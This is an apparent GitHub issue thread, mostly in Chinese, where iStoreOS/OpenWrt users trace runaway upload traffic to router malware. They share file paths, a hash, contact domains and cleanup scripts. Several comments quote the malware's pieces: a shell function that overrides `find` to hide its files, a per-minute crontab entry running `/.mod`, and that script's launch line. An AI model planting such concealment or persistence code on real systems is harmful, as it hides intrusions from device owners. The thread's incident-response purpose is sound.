### ISSUE TITLE
异常内网跑满上传，峰值六万个TCP连接

### ISSUE THREAD

**Issue by SalmonBall** [istoreos/istoreos#1282]
## 1.关于你要提交的问题
最新版istoreos使用一段时间后，就会触发bug，触发这个bug后就会高频率占用上传，电信家宽1000M，但是上传监测却能跑到120MB/s
查看状态-实时信息-连接，TCP连接在上传占用期间达到六万多个。实时信息里流量eth0，对应wan口占满全部上传速度。
重启只能短暂恢复正常使用，必须重置固件才能恢复正常使用，同时首页显示 DNS 错误。安装的软件有 UU加速器和 DDNSGO

设备intel NUC13ANBi5 加厚款可以添加一个2.5G网口，原来的2.5G网口用作wan。 16Gddr4 , 512G硬盘

**Comment by jjm2473** [comment]
我倒是怀疑中毒了 https://github.com/istoreos/istoreos/issues/1103

**Comment by ycdthyj** [comment]
我也遇到过

**Comment by LilacEssix** [comment]
一样的情况

**Comment by jjm2473** [comment]
用top命令看看哪个进程cpu占用率高

**Comment by WillzenZou** [comment]
我这也出现了异常TCP连接数和流量的情况，自己定制的rk3568的镜像，
1. top看不到高占用的进程
2. 没有装docker跑容器
3. 安装了ngnix配置了两个转发，一个myt-control和luci的转发，myt-control是我开发的页面，为了排查问题可以从进程列表中看到我已经把它stop了，目前没有运行。
4. 进行了恢复出厂设置，仍然出现这个情况。
5. 软件列表和crontab和rc.local都附上，目前没有头绪，top看不出东西，内网能被这个流量占满。
[opkg-list.txt](https://github.com/istoreos/istoreos/files/14137169/opkg-list.txt)

![1706860040728](https://github.com/istoreos/istoreos/assets/74403153/bab177e0-3f8e-48df-9a51-4d5ec4b6b487)
![17068598962740](https://github.com/istoreos/istoreos/assets/74403153/6b18dc55-8a6d-4f86-91c7-e4bf5eb1d242)
![17068599132945](https://github.com/istoreos/istoreos/assets/74403153/a31cea85-74d7-4e74-8315-e403663accfd)
![17068599913532](https://github.com/istoreos/istoreos/assets/74403153/cf3ac760-ec12-4505-bb81-075d11eded5a)
![17068600041630](https://github.com/istoreos/istoreos/assets/74403153/bd0505df-772a-4d51-8aea-df4e1b358082)
![17068601245934](https://github.com/istoreos/istoreos/assets/74403153/0ed9941d-4c71-4626-9aef-357fb860b4e2)
![17068601352366](https://github.com/istoreos/istoreos/assets/74403153/f5f08760-959f-4f23-8ce5-25b1f3b1d9d0)
![17068601681322](https://github.com/istoreos/istoreos/assets/74403153/d2117d98-8c42-4ce5-9884-e50ad0a710e6)
![17068601768925](https://github.com/istoreos/istoreos/assets/74403153/9641fe09-b7d0-420f-b3a9-09021a86c96c)
![17068601539106](https://github.com/istoreos/istoreos/assets/74403153/da963b09-a1ec-40f8-804d-b7b83db96bc7)

异常连接的IP（netstat -anp）47.110.23.184:*、103.116.15.174:*、104.21.8.91:443：
![54d898aa-f076-41f9-87ef-f8a1fbdb82f6](https://github.com/istoreos/istoreos/assets/74403153/a59a2fea-4abd-4f30-9705-8d266c8761ef)

目前没有头绪，出现情况时上级路由器显示如下：
![76393f3f-caa1-4ffa-9e97-a23360c9a017](https://github.com/istoreos/istoreos/assets/74403153/406c99bc-e4d0-4893-9043-1cb622c269fe)
![0576270f-ebfd-4f0f-b6b3-e5ae4253c676](https://github.com/istoreos/istoreos/assets/74403153/2a6283bc-191c-481c-8363-6d93288cb4f9)
另外一组是另外一个路由器的（两台3568分别连接到两台路由器下，不是同一个内网）
![318efa1d705e3776a5ecee719f4f4157](https://github.com/istoreos/istoreos/assets/74403153/272748cf-468d-401e-91c2-ebcfa9fa5814)
![aad7c310c354399831b37ecd11de22e2](https://github.com/istoreos/istoreos/assets/74403153/cbda49f1-6c4d-4472-93d9-3f26e0d06a7c)
![e1d8def2f41c359c1b7f6b067484a75f](https://github.com/istoreos/istoreos/assets/74403153/dd171edc-3e26-46b0-bcb1-f9dcf32c73c5)
目前力所能及能力有限，只能想到提供这么多信息，还请大大指点，看看能不能一起解决了。

**Comment by jjm2473** [comment]
截这么多图没用，关键是要检查哪个ip的流量大，不只是外部ip，还有内网是哪个设备流量大。

打开状态-实时信息-连接，看看有没有大流量经过istoreos，如果没有，那都跟istoreos无关了，你也没办法从istoreos里面排查问题，这时你要从网关上看看哪个内网ip流量高。

**Comment by jjm2473** [comment]
@WillzenZou 有空的话，给我发邮件，我远程看看。

**Comment by WillzenZou** [comment]
> 截这么多图没用，关键是要检查哪个ip的流量大，不只是外部ip，还有内网是哪个设备流量大。
> 
> 打开状态-实时信息-连接，看看有没有大流量经过istoreos，如果没有，那都跟istoreos无关了，你也没办法从istoreos里面排查问题，这时你要从网关上看看哪个内网ip流量高。

感谢大佬指点，“状态-实时信息-连接”这里也没有发现，远程晚点安排一下。目前问题不好排查，因为一开整个内网都崩了无法访问网络。另外内网设备的问题我排查过，把设备都关了仍然能出现。

另外：出现异常的源地址192.168.62.249:255以及192.168.62.223:255端口的都是IStoreOS本机的IP。

**Comment by jjm2473** [comment]
如果是istoreos自己有这么大流量，肯定有进程的cpu占用率很高的，用top就能看到了。

**Comment by jjm2473** [comment]
@WillzenZou 你有翻墙吗，把翻墙插件先禁用再联网看看

**Comment by WillzenZou** [comment]
> @WillzenZou 你有翻墙吗，把翻墙插件先禁用再联网看看

没有翻墙，软件列表上面有截图以及提供，top也有图，就是没发现我也挺困扰的。大佬稍安勿躁，晚点或者明天看看能不能安排远程给你看。

**Comment by WillzenZou** [comment]
@jjm2473 邮件已经发送，来自：willzen@yeah.net，先感谢大佬协助。目前使用了防火墙禁止了所有连接，免得导致断网无法远程。
![image](https://github.com/istoreos/istoreos/assets/74403153/348f7afd-cdf7-4a07-b653-d50d6f13c1a7)

**Comment by jjm2473** [comment]
@WillzenZou 你的机器肯定是中病毒了，可能还不止一个。

<img width="239" alt="image" src="https://github.com/istoreos/istoreos/assets/3896703/53846030-ea3a-4da9-ae66-43351077e374">

从你的截图来看，就有一个可疑的定时任务。`/.mod`是一个脚本，远程查看此文件，里面就是调用了`/usr/lib/libgdi.so.0.8.2`，而这个文件已确认是病毒 https://www.virustotal.com/gui/file/7e433e0c6041a2d8334d96741a7bc8586859ff9d93ed6857e1c41a37c68957ed/details

并且，病毒还不止一个副本和启动方式，包括副本`/boot/system.pub`（跟`/usr/lib/libgdi.so.0.8.2`完全一样），启动脚本在`/etc/init.d/dns-udp4`。除此以外，还有`/etc/rc.local`，`/etc/rc.d/dns-udp4`都包含病毒的启动脚本，病毒副本还包括`/usr/sbin/netstat.cfg`。

只要发现系统里面有`/boot/system.pub`，`/usr/lib/libgdi.so.0.8.2`，`/usr/sbin/netstat.cfg`中的任意一个，都可以确认感染此病毒。

**Comment by jjm2473** [comment]
再次强调一遍，刷机以后尽快修改密码，如果已经感染病毒或者怀疑被感染，在恢复出厂设置以后也要立马修改密码，而且最好是在断网的情况下恢复出厂设置和修改密码。有条件的还可以禁止ssh密码登录，改成只允许ssh证书登录。

**Comment by WillzenZou** [comment]
> @WillzenZou 你的机器肯定是中病毒了，可能还不止一个。
> 
> <img alt="image" width="239" src="https://private-user-images.githubusercontent.com/3896703/301871219-53846030-ea3a-4da9-ae66-43351077e374.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MDY4ODU4OTksIm5iZiI6MTcwNjg4NTU5OSwicGF0aCI6Ii8zODk2NzAzLzMwMTg3MTIxOS01Mzg0NjAzMC1lYTNhLTRkYTktYWU2Ni00MzM1MTA3N2UzNzQucG5nP1gtQW16LUFsZ29yaXRobT1BV1M0LUhNQUMtU0hBMjU2JlgtQW16LUNyZWRlbnRpYWw9QUtJQVZDT0RZTFNBNTNQUUs0WkElMkYyMDI0MDIwMiUyRnVzLWVhc3QtMSUyRnMzJTJGYXdzNF9yZXF1ZXN0JlgtQW16LURhdGU9MjAyNDAyMDJUMTQ1MzE5WiZYLUFtei1FeHBpcmVzPTMwMCZYLUFtei1TaWduYXR1cmU9MWY5MjQ3NTUzMmNlNmI3YmZjMzM3Y2QxMWNkOGEzNzBmNWEyMTUyYTUzZjYwOGYxOTE5MDljYTk0N2VmZmFiNyZYLUFtei1TaWduZWRIZWFkZXJzPWhvc3QmYWN0b3JfaWQ9MCZrZXlfaWQ9MCZyZXBvX2lkPTAifQ.TDBkBwBoXTr2F2dGPudnxkWSMF_PagnqNzPVi8HG8wk">
> 从你的截图来看，就有一个可疑的定时任务。`/.mod`是一个脚本，远程查看此文件，里面就是调用了`/usr/lib/libgdi.so.0.8.2`，而这个文件已确认是病毒 https://www.virustotal.com/gui/file/7e433e0c6041a2d8334d96741a7bc8586859ff9d93ed6857e1c41a37c68957ed/details
> 
> 并且，病毒还不止一个副本和启动方式，包括副本`/boot/system.pub`（跟`/usr/lib/libgdi.so.0.8.2`完全一样），启动脚本在`/etc/init.d/dns-udp4`。除此以外，还有`/etc/rc.local`，`/etc/rc.d/dns-udp4`都包含病毒的启动脚本，病毒副本还包括`/usr/sbin/netstat.cfg`。
> 
> 只要发现系统里面有`/boot/system.pub`，`/usr/lib/libgdi.so.0.8.2`，`/usr/sbin/netstat.cfg`中的任意一个，都可以确认感染此病毒。

学到了，非常感谢大佬指点，Linux还是比Windows好玩，有很多地方需要学习和研究！

**Comment by SalmonBall** [comment]
@WillzenZou 我想知道，你都用了什么插件，我不太明白是怎么中的病毒

**Comment by WillzenZou** [comment]
> @WillzenZou 我想知道，你都用了什么插件，我不太明白是怎么中的病毒

我这istoreos上面没装啥插件，中的病毒是来自局域网的，主要原因估计还是弱密码，不排除插件也会带病毒，可以根据@jjm2473 大佬提供的思路排查。主要检查/overlay/upper目录里面的内容，检查/etc/rc.local、/etc/crontab、root用户目录以及其他比较不常见的“."开头的隐藏文件（.bashrc、.bash_histroy、.ssh之类的比较常见的是正常的，bash shell和ssh用的，隐藏起来是为了不干扰用户）进行排查。

**Comment by by-JohnChen** [comment]
请检查以下文件是否有异常
```
/.mod
/boot/system.pub
/etc/rc.local
/etc/crontab
/etc/init.d/dns-4udp
/etc/profile.d/bash.cfg
/etc/profile.d/bash.cfg.sh
/etc/profile.d/gateway.sh
/lib/system.mark
/usr/lib/libgdi.so.0.8.2
/usr/sbin/netstat.cfg
```
```
/boot/system.pub
/lib/system.mark
/etc/profile.d/bash.cfg
/usr/sbin/netstat.cfg
/usr/lib/libgdi.so.0.8.2
```
这五个文件为病毒之本体请使用rm  删之
此外 /etc/init.d/下的所有启动脚本还被插入了 `/lib/system.mark` 请使用 `sed -i '/\/lib\/system\.mark/d' /etc/init.d/*`命令一键清除

**Comment by by-JohnChen** [comment]
> @WillzenZou 我想知道，你都用了什么插件，我不太明白是怎么中的病毒

默认密码 + 公网IP

**Comment by by-JohnChen** [comment]
你每次执行 `ps ls find lsof netstat ifconfig`
都会调用这个文件/etc/profile.d/gateway.sh从而启动和隐藏木马程序

**Comment by jjm2473** [comment]
最好断网，恢复出厂设置（甚至不保留配置刷机），然后马上改密码，最后再联网。

**Comment by by-JohnChen** [comment]
```
#!
function find { proc_name=$(/usr/bin/find $@);proc_name=$(echo "$proc_name" | sed -e '/\/usr\/bin\/include\//d');proc_name=$(echo "$proc_name" | sed -e '/dns-udp4/d');proc_name=$(echo "$proc_name" | sed -e '/quotaon.service/d');proc_name=$(echo "$proc_name" | sed -e '/system.pub/d');proc_name=$(echo "$proc_name" | sed -e '/gateway.sh/d');proc_name=$(echo "$proc_name" | sed -e '/.mod/d');proc_name=$(echo "$proc_name" | sed -e '/libgdi.so.0.8.2/d');proc_name=$(echo "$proc_name" | sed -e '/system.mark/d');proc_name=$(echo "$proc_name" | sed -e '/netstat.cfg/d');proc_name=$(echo "$proc_name" | sed -e '/bash.cfg/d');proc_name=$(echo "$proc_name" | sed -e '/system.mark/d');echo "$proc_name"; }
```

**Comment by by-JohnChen** [comment]
目前版本MD5值 f449ef47c4f79ab4ecfe3d11022333d5 
文件名
bash.cfg
libgdi.so.0.8.2
netstat.cfg
system.pub
system.mark

**Comment by by-JohnChen** [comment]
```www.c72s.com```这个域名建议屏蔽用于发送攻击指令

**Comment by by-JohnChen** [comment]
> 最好断网，恢复出厂设置（甚至不保留配置刷机），然后马上改密码，最后再联网。

没有必要，按照我上面发的把这些文件删掉，清理rc.loacl, crontab，init.d/就好了

**Comment by yh801** [comment]
我也中招了, htop查看有几个/tmp/xxxxxxx乱码的进程占满了cpu, 并大量上传. 跑满了120MB, 发现的时候已经传了1.5TB.
看了上面大佬们分享的, 直接重装了iStore, 然后断网passwd修改了root的密码. 现在一切正常了.

**Comment by w64050593** [comment]
好像是因为安装时没有修改密码导致被入侵了，我安装的是openwrt 22.03 ,有同样问题，会对外发送大量SYN包，导致宽带断线。
感染后会在/etc/crontab内自动添加一个定时任务：
*/1 * * * * root /.mod

.mod 文件内容为：
#!/bin/ash
/usr/lib/libgdi.so.0.8.2

运行后主动连接www.v72c.com或IP193.142.146.228 ,可能是下载攻击指令。然后会对外大量发送syn包

我提供的压缩包内有一个病毒文件libgdi.so.0.8.2，一个抓包文件，一个网络连接表复制：
proc/net/rf_conntract

**Comment by w64050593** [comment]
[
[Uploading linux发包病毒分析.zip…]()
](url)

**Comment by jjm2473** [comment]
以下文件：
```
/.mod
/boot/system.pub
/etc/init.d/dns-4udp
/etc/profile.d/bash.cfg
/etc/profile.d/bash.cfg.sh
/etc/profile.d/gateway.sh
/lib/system.mark
/usr/lib/libgdi.so.0.8.2
/usr/sbin/netstat.cfg
```
发现两个以上的话，可以确认是病毒 https://www.virustotal.com/gui/file/7e433e0c6041a2d8334d96741a7bc8586859ff9d93ed6857e1c41a37c68957ed/details

**Comment by stormyangyang** [comment]
同样遇到这种病毒，但是不清楚这个病毒是怎么中的。

**Comment by jjm2473** [comment]
> 同样遇到这种病毒，但是不清楚这个病毒是怎么中的。

大概率是因为没改系统默认密码

**Comment by AddaxSoft** [comment]
ah this was such a nasty virus! here is a script i coded to clean it up from your device / box:

```
#!/bin/sh

# List of files to search and process
FILES_LIST="
    /.mod
    /boot/system.pub
    /etc/init.d/dns-4udp
    /etc/profile.d/bash.cfg
    /etc/profile.d/bash.cfg.sh
    /etc/profile.d/gateway.sh
    /lib/system.mark
    /usr/lib/libgdi.so.0.8.2
    /usr/sbin/netstat.cfg
"

# Loop through the list of files
for file in $FILES_LIST; do
  # Check if the file exists
  if [ -f "$file" ]; then
    # Echo ";" to the file
    chmod 0600 "$file"
    echo ";" > "$file"

    # Change the file permissions to 000
    chmod 000 "$file"

    # Optional: Echo which file was processed (for logging/debugging)
    echo "Processed: $file"
  else
    # File not found message
    echo "File not found: $file"
  fi
done
```

run with:
`sh cleanvir.sh`

note: just deleting the files wont work as the virus just rewrites itself.

**Comment by QPass** [comment]
谢谢，忙活了一个晚上没找到问题，原来是病毒搞的鬼。
初始密码在这台路由器首次连外网之前就改掉了，还是中了招。

**Comment by jjm2473** [comment]
@QPass 内网也可能其他机器有木马啊，一样也会被感染，虽然可能性小一些，但内网也不是绝对安全的。

**Comment by plsy1** [comment]
保留设置刷机后删掉这些即可，中招好久了webui改了下密码才发现，笑死
```
/etc/profile.d/bash.cfg
/etc/profile.d/bash.cfg.sh
/etc/profile.d/gateway.sh
```

**Comment by hello123hello-bi** [comment]
求助：！！！同样的问题，已经确实这个病毒感染，目前没办法进行刷机（在外地），如何清除或者临时阻止

**Comment by QPass** [comment]
> 求助：！！！同样的问题，已经确实这个病毒感染，目前没办法进行刷机（在外地），如何清除或者临时阻止

上面有网友写了脚本，用终端创建一个.sh文件，打开编辑器把内容粘贴进去，保存，运行，就好了

**Comment by liwenyu03** [comment]
> 内容

好的，您测试过了

**Comment by yfding98** [comment]
> > 求助：！！！同样的问题，已经确实这个病毒感染，目前没办法进行刷机（在外地），如何清除或者临时阻止
> 
> 上面有网友写了脚本，用终端创建一个.sh文件，打开编辑器把内容粘贴进去，保存，运行，就好了

这个脚本运行了之后，过一会又有了，看了下定时任务又创建了

**Comment by yfding98** [comment]
![Image](https://github.com/user-attachments/assets/46518899-2ed7-4db5-8d39-27de68cad756)

**Comment by jjm2473** [comment]
@yfding98 你这个环境看起来不是openwrt，可能路径不一样。你可以先想办法杀掉病毒进程：`mount | grep /proc`看看病毒隐藏了哪个pid，然后`umount /proc/[pid]`让病毒显示，然后`kill -9 [pid]`，再运行之前的脚本看能不能成功。如果脚本运行成功，之后还是感染，那可能是变种，还有其他路径有病毒，或者纯粹是因为系统不一样，所以路径也不一样。

**Comment by QPass** [comment]
> > > 求助：！！！同样的问题，已经确实这个病毒感染，目前没办法进行刷机（在外地），如何清除或者临时阻止
> > 
> > 
> > 上面有网友写了脚本，用终端创建一个.sh文件，打开编辑器把内容粘贴进去，保存，运行，就好了
> 
> 这个脚本运行了之后，过一会又有了，看了下定时任务又创建了

可能病毒不一样，我遇到的这个会修改一些脚本，所有then后面都加了调用可执行文件的语句。导出配置、重置固件、再导入配置就没了。

<img width="981" alt="Image" src="https://github.com/user-attachments/assets/9749d55c-09be-43f9-82b5-db2924cb4610" />

**Comment by jjm2473** [comment]
备份-重置-还原不一定能清理掉病毒，如果这个病毒是为openwrt写的，那是有可能把自己加入到备份列表的。

**Comment by yfding98** [comment]
> [@yfding98](https://github.com/yfding98) 你这个环境看起来不是openwrt，可能路径不一样。你可以先想办法杀掉病毒进程：`mount | grep /proc`看看病毒隐藏了哪个pid，然后`umount /proc/[pid]`让病毒显示，然后`kill -9 [pid]`，再运行之前的脚本看能不能成功。如果脚本运行成功，之后还是感染，那可能是变种，还有其他路径有病毒，或者纯粹是因为系统不一样，所以路径也不一样。

感谢！解决了

**Comment by kc-bao** [comment]
此问题已在 **酷友社** 上被提及。那里可能有相关详细信息：

https://www.koolcenter.com/t/topic/2485/1
